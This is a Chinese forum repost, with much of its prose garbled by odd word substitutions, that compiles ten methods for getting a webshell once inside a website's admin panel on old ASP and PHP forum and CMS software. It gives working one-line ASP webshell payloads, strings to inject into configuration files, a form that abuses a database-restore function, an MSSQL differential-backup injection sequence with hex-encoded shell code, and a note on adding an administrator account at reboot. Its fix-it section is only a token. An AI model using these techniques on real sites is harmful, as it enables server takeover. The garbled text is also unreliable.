正进修后台拿Shell的体例,今日恰巧在网上瞥见获得后台拿shell的汇总全集,很不错的总结,分享了!版主给个精髓吧!??今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能成为脚本妙手.??动网上传漏洞,信任大伙拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全国,现在这种漏洞已经根柢斗劲难见到了,不扫除一些小网站模拟仍是存在此漏洞。在拿站历程中,我们凡是费了九牛两虎之力拿到办理员帐号和密码,并顺遂进入了后台,当然此时与拿到网站webshell还有一步之遥,但仍是有良多新手因想不出合适的体例而被拒之门外。是以,我们把常用的从后台获得webshell的体例进行了总结和归纳,概略情形有以下十细腻面。
详尽:若何进入后台,不是本文谈判规模,其具体体例就不说了,靠大伙去自己发挥。此文参考了前人的多方面的资料和信息,在此一并浮现感谢。
一、直接上传获得webshell?二、添加改削上传典型?三、操纵后台办理功效写入webshell四、操纵后台办理向设置装备摆设文件写webshell五、操纵后台数据库备份及恢复获得webshell六、操纵数据库压缩功效七、asp+mssql系统八、php+mysql系统?九、phpwind论坛从后台到webshell的三种体例
一、直接上传获得webshell
这种对php和jsp的一些轨范斗劲常见,MolyX BOARD即是其中一例,直接在神色图标办理上传.php典型,当然没有提醒,实在已经乐成了,上传的文件url应该是http://admin8.us/images/smiles/下,前一阵子的联众游戏站和163的jsp系统漏洞就可以直接上传jsp文件。文件名是原本的文件名,bo-博客后台可以可以直接上传.php文件,上传的文件路径有提醒。以及一年前很是流行的upfile.asp漏洞(动网5.0和6.0、早期的良多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站尽情可写目录中,从而拿到网站的办理员节制权限。
二、添加改削上传典型
现在良多的脚本轨范上传模块不是只答应上传正当文件典型,而年夜年夜都的系统是答应添加上传典型,bbsxp后台可以添加asa asP典型,ewebeditor的后台也可添加asa典型,经由过程改削后我们可以直接上传asa后缀的webshell了,还有一种情形是过滤了.asp,可以添加.aspasp的文件典型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传典型,这是php的一个特征,末尾的哪个只要不是已知的文件典型即可,php会将php.g1f作为.php来正常运行,从而也可乐成拿到shell。LeadBbs3.14后台获得webshell体例是:在上传典型中增添asp ,详尽,asp后背是有个空格的,然后在前台上传ASP马,当然也要在后背加个空格!
三、操纵后台控制面板写入webshell
上传漏洞根柢上补的也差不多了,所以我们进入后台后还可以经由过程改削相关文件来写入webshell。斗劲的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台改削设置装备摆设文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一体例是:添加一个新的友谊链接,在网站名称处写上冰狐最小马即可,最小马前后要肆意输入一些字符,http:\\网站\inc\IncHtm\BoardLink.asp即是我们想要的shell。
四、操纵后台办理向设置装备摆设文件写webshell
操纵”"”":”"//”等标识表记标帜结构最小马写入轨范的设置装备摆设文件,joekoe论坛,某某同学录,沸腾展望动静系统,COCOON Counter统计轨范等等,还有良多php轨范都可以,COCOON Counter统计轨范举例,在办理邮箱处添上[email protected]”:eval request(chr (35))//, 在配制文件中即是webmail=”[email protected]\”:eval request(chr(35))//”,还有一种体例即是写上 [email protected]”%><%eval request(chr(35))%><%’,这样就会形成前后对应,最小马也就运行了。<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的2006 客户端来连,需要说明的是数据库插马时刻要选前者。再如动易2005,到文章中心办理-顶部菜单设置-菜单别的特效,插入一句话马”%><%execute request(“l”)%><%’,保 存顶部栏目菜单参数设置乐成后,我们就获得马地址http://网站/admin/rootclass_menu_config.asp。
五、操纵后台数据库备份及恢复获得webshell
重若是操纵后台对access数据库的“备份数据库”或“恢复数据库”功效,“备份的数据库路径”等变量没有过滤导致可以把尽情文件后缀改 为asp,从而获得webshell,msssql版的轨范就直接应用了access版的代码,导致sql版仍是可以操纵。还可以备份网站asp文件为其他后缀 如.txt文件,从而可以检察并获得网页源代码,并获得更多的轨范信息增添获得webshell的机缘。在现实运用中凡是会碰着没有上传功效的时 候,可是有asp系统在运行,操纵此体例来检察源代码来获得其数据库的位置,为数据库插马来缔造机缘,动网论坛就有一个ip地址的数据库,在后台的ip办理中可以插入最小马然后备份成.asp文件即可。在谈谈冲破上传检测的体例,良多asp轨范期近使改了后缀名后也会提醒文件犯警,经由过程在.asp文件头加上gif89a改削后缀为gif来骗过asp轨范检测到达上传的方针,还有一种即是用记事本打开图片文件,肆意粘贴一部门复制到asp木马文件头,改削gif后缀后上传也可以冲破检测,然后备份为.asp文件,乐成获得webshell。
六、操纵数据库压缩功效
可以将数据的防下载失踪效从而使插入数据库的最小马乐成运行,斗劲典型的即是loveyuki的L-BLOG,在友谊添加的url出写上<%eval request (chr(35))%>, 提交后,在数据库操纵中压缩数据库,可以乐成压缩出.asp文件,用海洋的最小马的eval客户端连就获得一个webshell。
七、asp+mssql系统
这里需要提一点动网mssql版,可是可以直接当地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写一个当地提交的表单,代码如下:
<form action=http://网站/bbs/admin_data.asp?action=RestoreData&act=Restore method=”post”>
<p>已上传文件的位置:<input name=”Dbpath” type=”text” size=”80″></p>
<p>要复制到的位置:<input name=”backpath” type=”text” size=”80″></p>
<p><input type=”submit” value=”提交”></p> </form>
另存为.htm当地实施。把假图片上传路径填在“已上传文件的位置”何处,想要备份的WebShell的相对路径填写在“要复制到的位置”何处,提交就获得我们可爱的WebShell了,恢复代码和此类似,改削相关地方就可以了。没有碰着事后台实施mssql饬令斗劲强大的asp轨范后台,动网的数据库还原和备份是个摆设,不能实施sql饬令备份webshell,只能实施一些大略的盘问饬令。可以操纵mssql注入差别备份webshell,一样平常后台是浮现了绝对路径,只要有了注入点根柢上就可以差别备份乐成。下面是差别备份的主要语句代码,操纵动网7.0的注入漏洞可以用差别备份一个webshell,可以用操纵上面提到的体例,将conn.asp文件备份成.txt文件而获得库名。
差别备份的主要代码:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0×626273 backup database @a to disk=@s–
;Drop table [heige];create table [dbo].[heige] ([cmd] [image])–
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)–
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT–
这段代码中,0×626273是要备份的库名bbs的十六进制,可所以其他名字好比bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request(“l”)%>的十六进制,是lp最小马;0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也即是你要备份的webshell路径。当然也可以用斗劲常见备份体例来获得webshell,独一的不够即是备份后的文件过年夜,若是备份数据库中有防下载的的数据表,概略有错误的asp代码,备份出来的webshell就不会乐成运行,操纵差别备份是乐成率斗劲高的体例,而且极年夜的淘汰备份文件的巨细。
八、php+mysql系统
后台需要有mysql数据盘问功效,我们就可以操纵它实施SELECT … INTO OUTFILE盘问输出php文件,因为全数的数据是存放在mysql里的,所以我们可以经由过程正常本事把我们的webshell代码插入mysql在操纵SELECT … INTO OUTFILE语句导出shell。? 就可以暴出路径,php情形中斗劲轻易暴出绝对路径:)。提一点的是碰着是mysql在win系统下路径应该这样写。下面的体例是斗劲常用的一个导出webshell的体例,也可以写个vbs添加系统办理员的脚本导出到启动文件夹,系统重起后就会添加一个办理员帐号? 就会在up目录下生成文件名为saiy.php内容为的最小php木马, 末尾用lanker的客户端来毗连。现实运用中要考虑到文件夹是否有写权限。概略输入这样的代码 将会在当前目录生成一个a.php的最小马。
九、phpwind论坛从后台到webshell的三种体例
体例1 模板法
进入后台, 气概气派气概气派模版设置 ,在肆意一行写代码,记着,这代码必需顶着左边行写,代码前面不成以有任何字符。
方始2 脏话过滤法
体例3 用户品级办理
以上三种体例获得webshellr的密码是a,为lanker的一句话后门办事端。
十、也可以操纵网站访谒计数系统记实来获得webshell
解决方法
因为本文涉及的代码版本良多,所以不概略供给一个完竣的办理方案。有本事者可以针对本文提到的漏洞文件进行适当修补,若漏洞文件不影响系统操纵也可删除此文件。大伙若是不会修补,可以到相关官方网站下载最新补丁进行修复更新。同时也请大伙能时辰关注各年夜平安收集揭晓的最新通告,若自己发现相关漏洞也可实时看护官方网站。
后记
实在,从后台获得webshell的本事应该还有良多的,关头是要看大伙怎么无邪运用、举一反三,盼愿本文的体例能起到抛砖引玉的浸染。 列位加油吧,让我们将办事器节制到底!